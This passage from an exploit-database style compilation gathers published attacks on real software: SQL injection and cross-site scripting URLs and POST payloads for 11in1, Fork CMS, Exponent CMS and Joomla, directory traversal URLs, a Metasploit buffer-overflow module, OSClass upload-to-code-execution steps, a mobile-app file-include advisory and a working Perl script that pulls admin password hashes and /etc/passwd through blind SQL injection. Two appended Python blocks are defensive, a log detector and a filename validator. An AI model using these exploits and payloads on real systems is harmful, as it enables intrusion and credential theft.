        xhr.send(new Blob([aBody]));
      }
      </script>
      <form action="#">
        <input style="display:none;" type="submit" value="Up!" onclick="submitRequest();" />
      </form>
      </body>
      </html>

      The file cooldog.php is now available in path http://<web>/wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php

      5. Solution:

      Update to version 3.1.5
  17. source: https://www.securityfocus.com/bid/52306/info

11in1 CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

11in1 1.2.1 is vulnerable; other versions may also be affected.

http://www.example.com/11in1/admin/comments?topicID=1'[SQL Injection Vulnerability!]
  18. ###
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow (MSF)
#[+] Date: 25-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe
#[+] Twitter: @TCYB3R
##

##
# $Id: rmdownloader_bof.rb 2015-04-01 03:03 TUNISIAN CYBER $
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Free MP3 CD Ripper 1.1 Local Buffer Overflow Exploit',
      'Description'    => %q{
          This module exploits a stack buffer overflow in RM Downloader v2.7.5.400
          creating a specially crafted .ram file, an attacker may be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'TUNISIAN CYBER', # Original
          'TUNISIAN CYBER'  # MSF Module
        ],
      'Version'        => 'Version 2.7.5.400',
      'References'     =>
        [
          [ 'URL', 'https://www.exploit-db.com/exploits/36502/' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'           => 1024,
          'BadChars'        => "\x00\x0a\x0d",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP-SP3 (EN)', { 'Ret' => 0x7C9D30D7} ]
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.ram']),
      ], self.class)
  end

  def exploit
    sploit = rand_text_alphanumeric(35032) # Buffer Junk
    sploit << [target.ret].pack('V')
    sploit << make_nops(4)
    sploit << payload.encoded
    tc = sploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(tc)
  end
end
  19. source: https://www.securityfocus.com/bid/52306/info

11in1 CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

11in1 1.2.1 is vulnerable; other versions may also be affected.

http://www.example.com/11in1/admin/tps?id=1'[SQL Injection Vulnerability!]
  20. source: https://www.securityfocus.com/bid/52319/info

Fork CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

Fork CMS 3.2.7 and 3.2.6 are vulnerable; other versions may also be affected.

http://www.example.com/private/en/locale/edit?id=37&value="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&name="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&type[]="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&module="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&application="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&language[]="><script>alert("ZSL");</script>

Parameter: form_token
Method: POST

- POST /private/en/authentication/?querystring=/private/en HTTP/1.1
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=t275j7es7rj2078a25o4m27lt0; interface_language=s%3A2%3A%22en%22%3B; track=s%3A32%3A%22b8cab7d50fd32c5dd3506d0c88edb795%22%3B
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

backend_email=&backend_password=&form=authenticationIndex&form_token="><script>alert("ZSL");</script>&login=Log%20in

Parameters: position_1, position_2, position_3, position_4
Method: POST

- POST http://localhost/private/en/extensions/edit_theme_template?token=true&id=4 HTTP/1.1

form=edit&form_token=d75161cf347e7b12f53df4cf4082f27a&theme=triton&file=home.tpl&label=Home&position_0=&type_0_0=0&position_1="><script>alert("ZSL");</script>&position_2=left&position_3=right&position_4=top&type_4_0=1&position_5=advertisement&format=%5B%2F%2Cadvertisement%2Cadvertisement%2Cadvertisement%5D%2C%0D%0A%5B%2F%2C%2F%2Ctop%2Ctop%5D%2C%0D%0A%5B%2F%2C%2F%2C%2F%2C%2F%5D%2C%0D%0A%5Bmain%2Cmain%2Cmain%2Cmain%5D%2C%0D%0A%5Bleft%2Cleft%2Cright%2Cright%5D

Parameter: success_message
Method: POST

- POST http://localhost/private/en/form_builder/edit?token=true&id=1 HTTP/1.1

form=edit&form_token=&id=1&name=Contact&method=database_email&inputField-email%5B%5D=jox@jox.com&addValue-email=&email=jox@jox.com&success_message="><script>alert("ZSL");</script>&identifier=contact-en

Parameter: smtp_password
Method: POST

- POST http://localhost/private/en/settings/email HTTP/1.1

form=settingsEmail&form_token=&mailer_type=mail&mailer_from_name=Fork+CMS&mailer_from_email=jox@jox.com&mailer_to_name=Fork+CMS&mailer_to_email=jox@jox.com&mailer_reply_to_name=Fork+CMS&mailer_reply_to_email=jox@jox.com&smtp_server=&smtp_port=&smtp_username=&smtp_password="><script>alert("ZSL");</script>

Parameters: site_html_footer, site_html_header
Method: POST

- POST http://localhost/private/en/settings/index HTTP/1.1

form=settingsIndex&form_token=&site_title=My+website&site_html_header=&site_html_footer="><script>alert("ZSL");</script>&time_format=H%3Ai&date_format_short=j.n.Y&date_format_long=l+j+F+Y&number_format=dot_nothing&fork_api_public_key=f697aac745257271d83bea80f965e3c1&fork_api_private_key=6111a761ec566d325a623e0dcaf614e2&akismet_key=&ckfinder_license_name=Fork+CMS&ckfinder_license_key=QJH2-32UV-6VRM-V6Y7-A91J-W26Z-3F8R&ckfinder_image_max_width=1600&ckfinder_image_max_height=1200&addValue-facebookAdminIds=&facebook_admin_ids=&facebook_application_id=&facebook_application_secret=
  21. source: https://www.securityfocus.com/bid/52327/info

NetDecision is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.

NetDecision 4.6.1 is vulnerable; other versions may also be affected.

http://www.example.com:8087/...\...\...\...\...\...\windows\system.ini
http://www.example.com:8090/.../.../.../.../.../.../windows/system.ini
  22. source: https://www.securityfocus.com/bid/52312/info

Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

#!/usr/bin/perl
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net>
# www.securitybydefault.com
# Joomla <2.5.1 time based sql injection - vuln by Colin Wong
#
# using sleep() and not benchmark(), change for < mysql 5.0.12
#
# 1.- Database name: database()
# 2.- Users data table name: (change 'joomla' for database() result)
#     select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
# 3.- Admin password: (change zzz_users from previus sql query result)
#     select password from zzzz_users limit 1

use strict;
use LWP::UserAgent;
$| = 1;

my $url = $ARGV[0];
my $wtime = $ARGV[1];
my $sql = $ARGV[2];

unless ($ARGV[2]) {
    print "$0 <url> <wait time> <sql>\n";
    print "\texamples:\n";
    print "\t get admin password:\n";
    print "\t\t$0 http://host/joomla/ 3 'database()'\n";
    print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
    print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
    print "\t get file /etc/passwd\n";
    print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
    exit 1;
}

my ($len,$sqldata);
my $ua = LWP::UserAgent->new;
$ua->timeout(60);
$ua->env_proxy;

my $stime = time();
my $res = $ua->get($url);
my $etime = time();
my $regrtt = $etime - $stime;
print "rtt: $regrtt secs\n";

print "vuln?: ";
my $sleep = $regrtt + $wtime;
$stime = time();
$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
    print "ok!\n";
}
else {
    print "nope :(\n";
    exit 1;
}

my $lenoflen;
sub len {
    # length of length
    for (1..5) {
        my $sql=$_[0];
        $stime = time();
        $res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
        $etime = time();
        my $rtt = $etime - $stime;
        if ($rtt >= $regrtt + $wtime) {
            $lenoflen = $_;
            last;
        }
    }
    for (1..$lenoflen) {
        my $ll;
        $ll=$_;
        for (0..9) {
            my $sql=$_[0];
            $stime = time();
            $res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
            $etime = time();
            my $rtt = $etime - $stime;
            if ($rtt >= $regrtt + $wtime) {
                $len .= $_;
            }
        }
    }
    return $len;
}

sub data {
    my $sql = $_[0];
    my $len = $_[1];
    my ($bit, $str, @byte);
    my $high = 128;
    for (1..$len) {
        my $c=8;
        @byte="";
        my $a=$_;
        for ($bit=1;$bit<=$high;$bit*=2) {
            $stime = time();
            # select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
            $res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
            $etime = time();
            my $rtt = $etime - $stime;
            if ($rtt >= $regrtt + $wtime) {
                $byte[$c]="0";
            } else {
                $byte[$c]="1";
            }
            $c--;
        }
        $str = join("",@byte);
        print pack("B*","$str");
    }
}

$len = len($sql);
print "$sql length: $len\n";
print "$sql data:\n\n";
data($sql,$len);
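The script above is the attacker's side of a time-based blind injection: every probe carries a quote-terminated UNION SELECT with a SLEEP() call, and the extraction loop issues hundreds of them from one client. From the defender's side that traffic has an obvious shape in web server logs. The Python below is an added example, not part of the post or of the script's author's work: it parses a few constructed access-log lines (assumed Apache combined format with a trailing %T response-time field), URL-decodes the request target, flags the UNION/SLEEP/BENCHMARK pattern, notes when the server actually honoured the delay, and groups repeated probes by source address.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (assumed format: Apache combined log plus a
# trailing whole-second response time, as produced by a LogFormat ending in %T).
SAMPLE_LOG = """\
203.0.113.7 - - [15/Mar/2012:22:55:40 +0100] "GET /joomla/ HTTP/1.1" 200 5120 "-" "libwww-perl/6.02" 0
203.0.113.7 - - [15/Mar/2012:22:55:41 +0100] "GET /joomla/index.php/404'%20union%20select%20sleep(3)%20union%20select%20'1 HTTP/1.1" 404 2048 "-" "libwww-perl/6.02" 3
203.0.113.7 - - [15/Mar/2012:22:55:45 +0100] "GET /joomla/index.php/404'%20union%20select%20if(length(length((database())))=1,sleep(3),null)%20union%20select%20'1 HTTP/1.1" 404 2048 "-" "libwww-perl/6.02" 3
198.51.100.4 - - [15/Mar/2012:22:56:01 +0100] "GET /joomla/index.php/about-us HTTP/1.1" 200 7300 "-" "Mozilla/5.0" 0
198.51.100.9 - - [15/Mar/2012:22:56:05 +0100] "GET /joomla/index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 8100 "-" "Mozilla/5.0" 1
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "[^"]*" "(?P<ua>[^"]*)" (?P<secs>\d+)$'
)

# Signatures of the technique in the script above: a quote-terminated UNION SELECT
# carrying a timing primitive (SLEEP() or BENCHMARK()), checked after URL decoding.
TIMING_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
UNION_RE = re.compile(r"'\s*union\s+select\b", re.IGNORECASE)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["decoded"] = unquote_plus(entry["target"])
    entry["secs"] = int(entry["secs"])
    return entry


def classify(entry, slow_threshold=2):
    """Return the reasons a request looks like time-based injection probing (empty if clean)."""
    reasons = []
    decoded = entry["decoded"]
    if UNION_RE.search(decoded):
        reasons.append("quote-terminated UNION SELECT in URL")
    if TIMING_RE.search(decoded):
        reasons.append("timing primitive in URL")
        if entry["secs"] >= slow_threshold:
            reasons.append("request took %ds (server honoured the delay)" % entry["secs"])
    return reasons


def scan(log_text, slow_threshold=2):
    """Scan every line; return (ip, decoded target, reasons) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry, slow_threshold)
        if reasons:
            hits.append((entry["ip"], entry["decoded"], reasons))
    return hits


def suspicious_sources(log_text, min_hits=2):
    """Source addresses with repeated probes: the per-bit extraction loop is never a single request."""
    counts = {}
    for ip, _, _ in scan(log_text):
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= min_hits)


if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(ip, target, "->", "; ".join(reasons))
    print("sources with repeated probes:", suspicious_sources(SAMPLE_LOG))
```

Decoding before matching matters: the probes arrive with spaces encoded as %20, so a pattern applied to the raw line would miss them. The response-time check is what separates a scanner that merely sent the string from a host whose database actually slept, which is the case that needs an incident ticket rather than a WAF statistic.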
  23. source: https://www.securityfocus.com/bid/52328/info

Exponent CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Exponent CMS 2.0.4 is vulnerable; prior versions may also be affected.

http://www.example.com//exponent/cron/send_reminders.php?src=src%3d11"%3b}'%20or%201%3d1%20AND%20SLEEP(5)%20%3b%20--%20"
  24. source: https://www.securityfocus.com/bid/52336/info

OSClass is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.

An attacker can exploit these issues to obtain sensitive information and to upload arbitrary code and run it in the context of the webserver process.

OSClass 2.3.5 is vulnerable; prior versions may also be affected.

Arbitrary File Upload Vulnerability:

1. Take a php file and rename it .gif (not really needed since OSClass trusts mime type)
2. Upload that file as picture for a new item and get its name (is 5_small.jpg)
3. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding in combine.php)
4. Use combine.php to move itself to oc-content/uploads
   http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../uploads/combine.php&files=combine.php
   now we have a copy of combine.php placed into uploads dir (the same dir where our malicious php file has been uploaded)
5. Use uploads/combine.php to move 5_original.php to /remote.php
   http://www.example.com/osclass/oc-content/uploads/combine.php?files=5_original.jpg&type=/../../remote.php
6. Run the uploaded php file
   http://www.example.com/osclass/remote.php

Directory Traversal Vulnerability:

It is possible to download an arbitrary file (ie config.php) under the www root.

1. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding)
2. Move combine.php into web root
   http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../../combine.php&files=combine.php
3. Run combine to download config.php
   http://www.example.com/osclass/combine.php?files=config.php
  25. Document Title:
===============
PDF Converter & Editor 2.1 iOS - File Include Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1480

Release Date:
=============
2015-05-06

Vulnerability Laboratory ID (VL-ID):
====================================
1480

Common Vulnerability Scoring System:
====================================
6.9

Product & Service Introduction:
===============================
Text Editor & PDF Creator is your all-in-one document management solution for iPhone, iPod touch and iPad. It can catch documents from PC or Mac via USB cable or WIFI, email attachments, Dropbox and box and save it on your iPhone, iPod Touch or iPad locally.

(Copy of the Vendor Homepage: https://itunes.apple.com/it/app/text-editor-pdf-creator/id639156936 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a file include web vulnerability in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application.

Vulnerability Disclosure Timeline:
==================================
2015-05-06: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
AppzCreative Ltd
Product: PDF Converter & Text Editor - iOS Web Application (Wifi) 2.1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `submit upload` module.
Remote attackers are able to inject own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occurs in the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable file upload POST method request. Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.

The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Submit (Upload)

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index File Dir Listing (http://localhost:52437/)

Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by remote attackers (network) without privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Install the software to your iOS device
2. Start the mobile ios software and activate the web-server
3. Open the wifi interface for file transfers
4. Start a session tamper and upload a random file
5. Change in the live tamper by interception of the vulnerable value the filename input (lfi payload)
6. Save the input by processing to continue the request
7. The code executes in the main file dir index list of the local web-server (localhost:52437)
8. Open the link with the private folder and attach the file for successful exploitation with the path value
9. Successful reproduce of the vulnerability!

PoC: Upload File (http://localhost:52437/Box/)

<div id="module_main"><bq>Files</bq><p><a href="..">..</a><br>
<a href="<iframe>2.png"><../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png</a> ( 0.5 Kb, 2015-04-30 10:58:46 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form></div></center></body></html></iframe></a></p></div>

--- PoC Session Logs [POST] (LFI - Filename) ---
Status: 200[OK]
POST http://localhost:52437/Box/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3262] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:52437]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:52437/Box/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------321711425710317
Content-Disposition: form-data; name="file"; filename="../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png"
Content-Type: image/png

Reference(s):
http://localhost:52437/
http://localhost:52437/Box/

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request.
Restrict the filename input and disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
Encode the output in the file dir index list with the vulnerable name value to prevent application-side script code injection attacks.

Security Risk:
==============
The security risk of the local file include web vulnerability in the filename value of the wifi service is estimated as high. (CVSS 6.9)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   - www.vuln-lab.com                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php   - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
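The advisory's fix section asks for three things: validate the filename in the upload request, refuse stacked extensions, and encode the name when it is written back into the directory index. The Python below is an added illustration of that fix, not the vendor's code; the extension allow-list, the stem character set and the upload root are assumptions chosen for the example. The safe_join check also addresses the ../ traversal pattern seen in the NetDecision and OSClass posts above, by proving the resolved path stays under the upload directory after the filename has passed validation.

```python
import html
import os
import re

# Assumed policy for this example (not the vendor's code): a bare basename
# from a small character set with exactly one extension from an allow-list.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}
STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


class InvalidFilename(ValueError):
    """Raised when a client-supplied filename fails the policy."""


def validate_upload_filename(raw):
    """Return the normalised filename, or raise InvalidFilename.

    Rejects control characters, path separators and traversal, markup
    characters (the advisory's <iframe> payload), and stacked extensions
    such as shell.php.png.
    """
    if not isinstance(raw, str) or not raw:
        raise InvalidFilename("empty filename")
    if any(ord(ch) < 32 or ord(ch) == 127 for ch in raw):
        raise InvalidFilename("control character in filename")
    if "/" in raw or "\\" in raw or raw in (".", ".."):
        raise InvalidFilename("path separator or traversal in filename")
    if os.path.basename(raw) != raw:  # second opinion from the platform's own path rules
        raise InvalidFilename("filename is not a bare basename")
    parts = raw.split(".")
    if len(parts) != 2:
        raise InvalidFilename("filename must have exactly one extension")
    stem, ext = parts
    if not STEM_RE.match(stem):
        raise InvalidFilename("disallowed characters in filename")
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise InvalidFilename("extension not allowed: %r" % ext)
    return "%s.%s" % (stem, ext)


def check_filename(raw):
    """Convenience wrapper: the accepted name, or None when the policy rejects it."""
    try:
        return validate_upload_filename(raw)
    except InvalidFilename:
        return None


def safe_join(upload_root, filename):
    """Resolve filename under upload_root and prove the result stays inside it."""
    root = os.path.realpath(upload_root)
    dest = os.path.realpath(os.path.join(root, filename))
    if os.path.commonpath([root, dest]) != root:
        raise InvalidFilename("resolved path escapes upload root")
    return dest


def render_listing(filenames):
    """Directory-index HTML with each stored name escaped in both the href and the text."""
    rows = []
    for name in filenames:
        esc = html.escape(name, quote=True)
        rows.append('<a href="%s">%s</a><br />' % (esc, esc))
    return "\n".join(rows)


if __name__ == "__main__":
    # Constructed inputs: the advisory's payload shape, a stacked extension, a clean name.
    for candidate in ["../<iframe>2.png", "shell.php.png", "report.PDF"]:
        print("%-20s -> %s" % (candidate, check_filename(candidate)))
    print(render_listing(["<iframe>2.png", "report.pdf"]))
```

Validation and output encoding are kept as separate steps on purpose: the allow-list stops the stored name from ever containing a path or markup, and the escaping in render_listing protects the index even for names that were stored before the validation existed.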